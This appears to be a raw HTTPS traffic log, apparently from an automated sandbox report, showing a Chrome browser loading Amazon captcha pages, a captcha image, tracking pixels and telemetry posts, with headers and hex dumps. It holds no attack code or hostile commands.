                                                                                                                                  Referer: https://www.amazon.com/errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:53 UTC552INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:53 GMT
                                                                                                                                  x-amz-rid: Z2W5Q2NMT8ZFTHR536PX
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 a7dcca466407f1871feceef50bc84272.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: tsd9hbxDqq42GvlMwF3BSktE3vypHnz8VEuiQ04H7hUjDkG5S0jPaQ==
                                                                                                                                  2025-01-27 14:45:53 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:45:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  58192.168.2.55005418.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:53 UTC623OUTGET /1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:53 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:53 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 52b86490-2c69-4c91-845d-8710f04d0611
                                                                                                                                  2025-01-27 14:45:53 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  59192.168.2.550056108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:53 UTC628OUTGET /captcha/fmvtfjch/Captcha_pslxfojrtx.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:53 UTC902INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5153
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 976ea46a-6511-478f-a273-b812cf07904e
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:13:15 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-672,/captcha/fmvtfjch/Captcha_pslxfojrtx
                                                                                                                                  Surrogate-Key: x-cache-672 /captcha/fmvtfjch/Captcha_pslxfojrtx
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:53 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 4dd80d99fd5d0f6baaaf5179cd921f72.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 12265
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: 85wLQVuLlwFgwPxaJ22L1Dyzh-zGzR2Hf3J8uc3-Pgk9-K9QBa6wkA==
                                                                                                                                  2025-01-27 14:45:53 UTC5153INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1e 00 01 00 03 00 02 03 01 01 00 00 00 00 00 00 00 00 00 08 09 0a 03 0b 02 06 07 04 05 ff c4 00 28 10 00 01 04 02 02 02 02 02 02 03 01 00 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 13 12 14 15 16 17 18 22 21 ff da 00 08 01 01 00 00 3f 00 df c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f 97 db 86 72 bf f8 c3 b9 4f e1 95 ff 00 ce 15 f3 ff 00 9c e7 e3 90 ab bb de 43 3a 8b e3 b7 5d 81 b2 7b 61 b8 2b 9a da 3a 7f
                                                                                                                                  Data Ascii: JFIFHHCF("!?src%py%#^rOC:]{a+:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  60192.168.2.55005718.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:53 UTC621OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 4037
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:53 UTC4037OUTData Raw: 7b 22 72 69 64 22 3a 22 4a 56 32 34 47 45 56 51 36 57 51 54 4d 38 34 53 43 54 4d 38 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 77 22 3a 31 32 38 30 2c 22 68 22 3a 37 30 37 2c 22 74 22 3a 31 30 37 35 2c 22 6b 22 3a 22 64 6f 69 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 33 34 39 2c 22 73 22 3a 31 37 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 44 49 56 22 2c 22 69 64 22 3a 31 36 31 2c 22 61 74 74 72 22 3a 7b 22 73 74 79 6c 65 22 3a 22 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                  Data Ascii: {"rid":"JV24GEVQ6WQTM84SCTM8","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"opfcsm-i":{"w":1280,"h":707,"t":1075,"k":"doi"}},{"opfcsm-i":{"t":1349,"s":172,"k":"snpm","n":"DIV","id":161,"attr":{"style":"position:
                                                                                                                                  2025-01-27 14:45:53 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:53 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 15c1f5ce-41e8-4915-9d86-70e7b17d83b3
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  61192.168.2.55005854.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:54 UTC390OUTGET /1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:54 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:54 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: b53d65e5-f9a5-4051-9950-c27f63a73642
                                                                                                                                  2025-01-27 14:45:54 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  62192.168.2.55005918.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:54 UTC394OUTGET /captcha/fmvtfjch/Captcha_pslxfojrtx.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:54 UTC857INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5153
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 1cb4a4df-7669-4b04-a11f-0edca28d5c75
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:13:15 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-564,/captcha/fmvtfjch/Captcha_pslxfojrtx
                                                                                                                                  Surrogate-Key: x-cache-564 /captcha/fmvtfjch/Captcha_pslxfojrtx
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 11:31:34 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 da78abc509aafffb42eec33ca2dc60d4.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 12266
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: KBzv4MwJsVUGg031G6AfYIYFcWTzy2nuL9fuqLZAuf2lzPfOBE1lcQ==
                                                                                                                                  2025-01-27 14:45:54 UTC5153INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1e 00 01 00 03 00 02 03 01 01 00 00 00 00 00 00 00 00 00 08 09 0a 03 0b 02 06 07 04 05 ff c4 00 28 10 00 01 04 02 02 02 02 02 02 03 01 00 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 13 12 14 15 16 17 18 22 21 ff da 00 08 01 01 00 00 3f 00 df c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f 97 db 86 72 bf f8 c3 b9 4f e1 95 ff 00 ce 15 f3 ff 00 9c e7 e3 90 ab bb de 43 3a 8b e3 b7 5d 81 b2 7b 61 b8 2b 9a da 3a 7f
                                                                                                                                  Data Ascii: JFIFHHCF("!?src%py%#^rOC:]{a+:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  63192.168.2.55006018.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:54 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 22639
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:54 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 5a 32 57 35 51 32 4e 4d 54 38 5a 46 54 48 52 35 33 36 50 58 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 31 31 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a 30 2c
                                                                                                                                  Data Ascii: {"rid":"Z2W5Q2NMT8ZFTHR536PX","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":11}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":0,
                                                                                                                                  2025-01-27 14:45:54 UTC6255OUTData Raw: 32 35 2c 22 73 22 3a 31 32 30 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 30 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 35 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 32 35 2c 22 73 22 3a 31 32 31 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 63 6f 6d 6d 65 6e 74 22 2c 22 69 64 22 3a 31 32 31 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 31 32 30 2c 22 74 78 74 22 3a 22 5c 6e 43 6f 72 72 65 69 6f 73 2e 44 6f 4e 6f 74 53 65 6e 64 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 32 35 2c 22 73 22 3a 31 32 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 32 2c 22 70 69 64 22 3a 31
                                                                                                                                  Data Ascii: 25,"s":120,"k":"snpm","n":"#text","id":120,"pid":1,"sid":5,"txt":"\n\n"}},{"opfcsm-i":{"t":25,"s":121,"k":"snpm","n":"#comment","id":121,"pid":1,"sid":120,"txt":"\nCorreios.DoNotSend\n"}},{"opfcsm-i":{"t":25,"s":122,"k":"snpm","n":"#text","id":122,"pid":1
                                                                                                                                  2025-01-27 14:45:55 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:55 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: ba421556-0c10-4225-8e56-7dd3eed68113
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  64192.168.2.55005599.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:01 UTC905OUTGET /errors/validateCaptcha?amzn=aWtjLQPQePOkOjbZRBDfnw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://www.amazon.com/errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:46:02 UTC552INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:02 GMT
                                                                                                                                  x-amz-rid: 84WJXV7DNH36VC70R49D
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 04599a8a3c6eb66f23e5ae02d1ec4cf2.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: vzzA8HOiSNmcBiRnVXb1nxzrSADJFFOk5e5GmiL8k9cVBPsNweMOJw==
                                                                                                                                  2025-01-27 14:46:02 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:46:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  65192.168.2.55006218.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:02 UTC621OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 4035
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
